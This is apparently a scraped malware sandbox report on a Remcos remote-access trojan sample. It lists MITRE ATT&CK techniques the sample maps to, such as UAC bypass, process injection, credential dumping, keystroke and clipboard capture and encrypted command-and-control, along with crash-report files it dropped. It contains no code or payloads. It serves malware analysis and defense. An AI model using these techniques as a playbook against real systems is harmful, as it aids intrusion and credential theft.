Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 2iH7rqx9rQ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2iH7rqx9rQ.exe_23a1efeea024534baba17aaad5d4a4863389c7d_82a4bb13_3482be79-b869-454c-820b-8e07f6271646\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2iH7rqx9rQ.exe_8643f1cd2c1d2784ead29abf2402e836c9571c_82a4bb13_1ae3fb9f-3fa1-4def-a763-351f8d175778\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2iH7rqx9rQ.exe_8643f1cd2c1d2784ead29abf2402e836c9571c_82a4bb13_3574e9e7-ccf8-441b-8b34-1c1bd3b79548\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2iH7rqx9rQ.exe_8643f1cd2c1d2784ead29abf2402e836c9571c_82a4bb13_538e896f-b6d0-4c7e-ba42-c5fa3a74b90e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2iH7rqx9rQ.exe_8643f1cd2c1d2784ead29abf2402e836c9571c_82a4bb13_74ac6590-a04e-4313-80b4-be6064186ed5\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2iH7rqx9rQ.exe_8643f1cd2c1d2784ead29abf2402e836c9571c_82a4bb13_9457c8c1-45d6-47a9-a325-a116b31a2bb5\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2iH7rqx9rQ.exe_8643f1cd2c1d2784ead29abf2402e836c9571c_82a4bb13_a01e0c67-033e-4640-b55f-69ba059ab34e\Report.wer

Windows Analysis Report
2iH7rqx9rQ.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre